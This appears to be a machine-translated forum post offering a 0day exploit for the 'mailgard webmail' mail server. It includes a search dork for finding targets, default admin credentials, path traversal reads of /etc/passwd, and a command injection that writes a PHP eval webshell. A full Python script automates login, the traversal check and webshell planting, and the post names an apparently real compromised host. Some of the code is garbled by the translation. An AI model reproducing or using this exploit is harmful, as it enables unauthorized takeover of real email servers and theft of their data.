Youyou (mailgard webmail) email server getshell 0day, with python exp
1. Download any file (login required)
Baidu search intitle: "mailgard webmail", a number of moves without changing the admin password, the default password admin/hicomadmin
Http://mail.xxx.com.cn/src/read_file.php? Signature = ../etc/passwd
Http://mail.xxx.com.cn/src/read_file.php? Uploadimage =.../passwd
According to this vulnerability, read lighttpd error. log to get the web directory:/var/www/newmail/
2. getshell caused by System Command Execution
Download files for code auditing, find a Command Execution Vulnerability
Line 3 of/var/www/newmail/src/ajaxserver. php starts:
If ($ _ GET ['exec '] = 'recall') {// recall the email $ user = str_replace ('\\','\\\\', $ _ POST ['user']); $ messageid = str_replace ('\', '\', $ _ POST ['messageid']); system (HM_SHELL. "Mail_recall.sh '". $ user. "''". $ messageid. "''". $ onlineip. "'> null &"); unset ($ _ SESSION ['h _ MAILS'] ['sent']); echo 'OK'; exit ;}
The programmer sb directly destroys the protection of magic_quotes_gpc and addslashes (the system itself carries global filtering, and the code is copied by discuz), resulting in getshell:
Obtain the webshell, http://mail.sihc.com.cn/shell.php, and password 123 as follows.
http://mail.xxx.com.cn/src/ajaxserver.php?exec=recallPOST: user=1'|echo '<?php eval($_POST[123]); ?>'>/var/www/newmail/shell.php #&messageid=1
The automation exp is as follows:
Usage python fuck. py http://mail.test.com: 80/account password
import requestsimport sysif len(sys.argv) < 4:print 'usage:python fuck.py http(s)://target:port/ <username> <password>'print 'example:python fuck.py http://mail.test.com:80/ admin admin'sys.exit(0)else:target = sys.argv[1]if not target.endswith('/'):target += '/'username = sys.argv[2]password = sys.argv[3]sessionid = ''def login(target,username,password):login_request = ''global sessioniddomain = target[(target.index('.')+1):(target.index(':',6))]print 'domain=' + domainlogin_url = target + 'index.php'post_data = 'txtname=' + username + '&domain=' + domain + '&txtpwd=' + password + '&languages=zh-cn&button=%E7%99%BB+%E5%BD%95'try:login_request = requests.post(login_url,post_data,allow_redirects=False,verify=False,timeout=3)if login_request.status_code == 302:print 'login succeeded'sessionid = login_request.cookies['PHPSESSID']return sessionidelse:print 'login failed,please check username and password'return Falseexcept Exception,e: print Exception,":",ereturn Falsedef check(target,sessionid):check_request = ''url = target + 'src/read_file.php?uploadimage=../../../../../../../../../../etc/passwd'request_header = {'cookie': 'MAILSESSID=' + str(sessionid) + '; PHPSESSID=' + str(sessionid)}try:check_request = requests.get(url,headers=request_header,verify=False,timeout=3)if 'root:x:0:0:root:/root:/bin/bash' in check_request.text and check_request.status_code == 200:print 'target is vulnerable\r\n'# print 'the content of file \'/etc/passwd\'\r\n'# print check_request.textreturn Trueelse:print 'target is not vulnerable'return Falseexcept Exception,e: print Exception,":",ereturn Falsedef getshell(target,sessionid):getshell_request = ''fuckurl = target + 'src/ajaxserver.php?exec=recall'getshell_header = {'cookie': 'MAILSESSID=' + str(sessionid) + '; PHPSESSID=' + str(sessionid)}getshell_data = 'user=1\'|echo \'<?php eval($_POST[123]); ?>\'>/var/www/newmail/shell123.php #&messageid=1'# print getshell_datatry:getshell_request = requests.post(fuckurl,getshell_data,headers=getshell_header,allow_redirects=False,verify=False)if (requests.get(target + 'shell123.php',verify=False).status_code == 200):print 'getshell succeeded,address:' + str(target + 'shell123.php') + ' password:123'else:print 'getshell failed!'except Exception,e: print Exception,":",ereturn Falseif __name__ == '__main__':if (login(target,username,password)):print 'sessionid=' + sessionidif(check(target,sessionid)):print 'target is vulnerable to directory transversal'else:print 'target is not vulnerable to directory transversal'print 'trying to getshell,please wait'getshell(target,sessionid)
Baidu search intitle: "mailgard webmail", a number of moves without changing the admin password, the default password admin/hicomadmin
Solution:
Filter